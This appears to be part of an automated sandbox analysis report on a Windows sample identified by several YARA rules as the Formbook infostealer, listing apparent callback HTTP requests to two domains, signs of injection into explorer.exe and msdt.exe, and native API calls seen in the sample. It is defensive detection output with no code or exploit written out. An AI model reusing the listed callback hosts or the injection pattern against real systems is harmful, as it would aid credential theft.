              Source: global traffic, HTTP traffic detected: GET /ar73/?Qj=i6BPGBhEPZBlfl7tAP1UBBwzioJGNNDALkR90REkFgMzqoaCb5EMO/kcO5kV95GeH/kMM6gDFg==&x6=n0GdIP_ HTTP/1.1, Host: www.kellnovaglobalfood.info, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
              Source: global traffic, HTTP traffic detected: GET /ar73/?Qj=pTDthzaqbIgyWHdtpzpwnulvL2qvi2wcQCOYQZrmaB3EJlnnV9x+gp8AnzNn3ZLGsW0uMr4raA==&x6=n0GdIP_ HTTP/1.1, Host: www.controlplus.systems, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
              Source: 7pECKdsaig.exe, 00000000.00000002.289211291.000000000145A000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              E-Banking Fraud

              Source: Yara match, File source: 7pECKdsaig.exe, type: SAMPLE
              Source: Yara match, File source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match, File source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              System Summary

              Source: 7pECKdsaig.exe, type: SAMPLE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 7pECKdsaig.exe, type: SAMPLE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 7pECKdsaig.exe, type: SAMPLE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: Process Memory Space: 7pECKdsaig.exe PID: 6000, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: Process Memory Space: explorer.exe PID: 3452, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: Process Memory Space: msdt.exe PID: 5148, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 7pECKdsaig.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 7pECKdsaig.exe, type: SAMPLE, Matched rule: Windows_Trojan_Formbook_1112e116, reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 7pECKdsaig.exe, type: SAMPLE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 7pECKdsaig.exe, type: SAMPLE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: Process Memory Space: 7pECKdsaig.exe PID: 6000, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: explorer.exe PID: 3452, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: msdt.exe PID: 5148, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 04ACB150 appears 35 times
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_00A9A350 NtCreateFile,0_2_00A9A350
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_00A9A480 NtClose,0_2_00A9A480
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_00A9A400 NtReadFile,0_2_00A9A400
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_00A9A530 NtAllocateVirtualMemory,0_2_00A9A530
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_00A9A3FB NtReadFile,0_2_00A9A3FB
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_00A9A47A NtClose,0_2_00A9A47A
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_01759910 NtAdjustPrivilegesToken,LdrInitializeThunk,0_2_01759910
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_017599A0 NtCreateSection,LdrInitializeThunk,0_2_017599A0
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_01759860 NtQuerySystemInformation,LdrInitializeThunk,0_2_01759860
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_01759840 NtDelayExecution,LdrInitializeThunk,0_2_01759840
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_017598F0 NtReadVirtualMemory,LdrInitializeThunk,0_2_017598F0
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_01759A50 NtCreateFile,LdrInitializeThunk,0_2_01759A50
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_01759A20 NtResumeThread,LdrInitializeThunk,0_2_01759A20
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_01759A00 NtProtectVirtualMemory,LdrInitializeThunk,0_2_01759A00
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_01759540 NtReadFile,LdrInitializeThunk,0_2_01759540
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_017595D0 NtClose,LdrInitializeThunk,0_2_017595D0
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_01759710 NtQueryInformationToken,LdrInitializeThunk,0_2_01759710
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_017597A0 NtUnmapViewOfSection,LdrInitializeThunk,0_2_017597A0
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_01759780 NtMapViewOfSection,LdrInitializeThunk,0_2_01759780
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_01759660 NtAllocateVirtualMemory,LdrInitializeThunk,0_2_01759660
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_017596E0 NtFreeVirtualMemory,LdrInitializeThunk,0_2_017596E0
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_01759950 NtQueueApcThread,0_2_01759950
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_017599D0 NtCreateProcessEx,0_2_017599D0
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_0175B040 NtSuspendThread,0_2_0175B040
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_01759820 NtEnumerateKey,0_2_01759820
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_017598A0 NtWriteVirtualMemory,0_2_017598A0
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_01759B00 NtSetValueKey,0_2_01759B00
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_0175A3B0 NtGetContextThread,0_2_0175A3B0
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_01759A10 NtQuerySection,0_2_01759A10
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_01759A80 NtOpenDirectoryObject,0_2_01759A80
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_01759560 NtWriteFile,0_2_01759560
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_0175AD30 NtSetContextThread,0_2_0175AD30
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_01759520 NtWaitForSingleObject,0_2_01759520
              Source: C:\Users\user\Desktop\7pECKdsaig.exeCode function: 0_2_017595F0 NtQueryInformationFile,0_2_017595F0
              Source: C:\Windows\explorer.exeCode function: 1_2_100D9E12 NtProtectVirtualMemory,1_2_100D9E12
              Source: C:\Windows\explorer.exeCode function: 1_2_100D8232 NtCreateFile,1_2_100D8232
              Source: C:\Windows\explorer.exeCode function: 1_2_100D9E0A NtProtectVirtualMemory,1_2_100D9E0A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09860 NtQuerySystemInformation,LdrInitializeThunk,2_2_04B09860
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09840 NtDelayExecution,LdrInitializeThunk,2_2_04B09840
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B099A0 NtCreateSection,LdrInitializeThunk,2_2_04B099A0
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B095D0 NtClose,LdrInitializeThunk,2_2_04B095D0
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_04B09910
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09540 NtReadFile,LdrInitializeThunk,2_2_04B09540
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B096E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_04B096E0
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B096D0 NtCreateKey,LdrInitializeThunk,2_2_04B096D0
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_04B09660
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09650 NtQueryValueKey,LdrInitializeThunk,2_2_04B09650
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09A50 NtCreateFile,LdrInitializeThunk,2_2_04B09A50
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09780 NtMapViewOfSection,LdrInitializeThunk,2_2_04B09780
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09FE0 NtCreateMutant,LdrInitializeThunk,2_2_04B09FE0
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09710 NtQueryInformationToken,LdrInitializeThunk,2_2_04B09710
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B098A0 NtWriteVirtualMemory,2_2_04B098A0
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B098F0 NtReadVirtualMemory,2_2_04B098F0
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09820 NtEnumerateKey,2_2_04B09820
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B0B040 NtSuspendThread,2_2_04B0B040
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B095F0 NtQueryInformationFile,2_2_04B095F0
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B099D0 NtCreateProcessEx,2_2_04B099D0
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B0AD30 NtSetContextThread,2_2_04B0AD30
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09520 NtWaitForSingleObject,2_2_04B09520
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09560 NtWriteFile,2_2_04B09560
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09950 NtQueueApcThread,2_2_04B09950
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09A80 NtOpenDirectoryObject,2_2_04B09A80
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09A20 NtResumeThread,2_2_04B09A20
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09610 NtEnumerateValueKey,2_2_04B09610
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09A10 NtQuerySection,2_2_04B09A10
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09A00 NtProtectVirtualMemory,2_2_04B09A00
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09670 NtQueryInformationProcess,2_2_04B09670
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B0A3B0 NtGetContextThread,2_2_04B0A3B0
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B097A0 NtUnmapViewOfSection,2_2_04B097A0
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09730 NtQueryVirtualMemory,2_2_04B09730
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B0A710 NtOpenProcessToken,2_2_04B0A710
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09B00 NtSetValueKey,2_2_04B09B00
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09770 NtSetInformationFile,2_2_04B09770
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B0A770 NtOpenThread,2_2_04B0A770
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B09760 NtOpenProcess,2_2_04B09760
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_0059A350 NtCreateFile,2_2_0059A350
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_0059A400 NtReadFile,2_2_0059A400
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_0059A480 NtClose,2_2_0059A480
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_0059A530 NtAllocateVirtualMemory,2_2_0059A530
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_0059A3FB NtReadFile,2_2_0059A3FB
